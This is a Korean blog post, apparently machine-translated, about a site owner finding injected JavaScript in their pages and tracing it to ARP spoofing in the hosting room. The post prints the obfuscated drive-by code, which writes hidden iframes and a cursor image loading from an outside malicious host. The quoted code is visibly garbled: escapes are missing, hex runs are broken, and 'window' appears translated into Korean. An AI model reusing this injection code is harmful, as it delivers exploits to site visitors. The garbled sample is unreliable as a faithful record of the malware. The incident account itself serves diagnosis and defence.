어젯밤에 나는 내 웹사이트를 방문했을 때 웹페이지의 html 코드 앞에 js 코드 문자열이 있다는 것을 발견했습니다. 처음에는 웹사이트가 해킹당한 줄 알고 급히 서버에 가서 모든 파일에 이 js 코드 문자열이 포함되어 있는지 확인했지만, 검색 결과도 나오지 않았고, 서버에서도 해킹된 흔적을 찾을 수 없었습니다.
그래서 이 코드로만 시작할 수 있으니 이 js를 다운로드합니다. 개발에서 발견한 코드는 다음과 같습니다.
window[ "x64x6fx63x75x6dx65x6ex74" ]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d"x4 3x55x52x53x4fx52x3a x75x72x6cx28'x68 x74x74x70x3a//x66x75x63x6b x2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x31x2ex67x69x66'x29"x3e")
창 ["x64x6fx63x75x6dx65x6ex74 "]["x77x72x69x74x65x6cx6e"] ("x3cx44x49x56 x73x74x79x6cx65x3d" x43x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d /x64x69x72/x69x6ex64x65x78x5fx70 x69x63/x32x2ex67x69x66'x29"x3ex3c/x44x49x56x3ex3c/x44x49x56x3e"); "x3cx69x66x72x61x6dx65 x73x72x6 3x3dx68x74x74x70x3a//x66x75x63x6b 9x63/ x30x36x30x31x34x2ex68x74x6d x77x69x64x74x68x3dx31 x68x65x69x67x68x74x3dx31x3ex3c/x69x66x7 2x61x6dx65x3e");
창 ["x64x6fx63 x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6bx2ex6ex73 x32x67x6fx 2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x74x6ax2ex68x74x6d x77x69x64x74x68x3dx30 66x72x61x6dx65x3e")
구글에서 검색해보니 누군가 발견한 내용이더군요. 같은 상황입니다. http://0e2.net/post/676.html
이 글을 읽어보니 해킹된 곳은 서버가 아니라 서버가 있는 컴퓨터실이 감염된 것으로 확인되었습니다. 트로이 목마 바이러스가 arp 스푸핑에 관여하고 있습니다.
이 트로이 목마는 내 서버에서 보낸 패킷을 캡처한 후 패킷의 내용을 변조하고 이전 트로이 목마 바이러스 코드를 HTML 헤더에 추가한 다음 사용자에게 호스트로 전달했습니다. 이 트로이 목마는 IE의 ani 취약점을 타겟으로 합니다. Microsoft 사용자의 컴퓨터는 가능한 한 빨리 업그레이드하고 패치해야 합니다.
마지막 문제는 내 서버가 ARP에 의해 스푸핑되는 것을 방지하는 방법입니다. , 기술 직원이 mac 주소와 ip 주소를 바인딩해 달라고 요청했고, 마침내 문제가 해결되었습니다.
ARP 스푸핑 관련 지식에 대해:
http://zhidao.baidu.com/question/7980952.html?si =1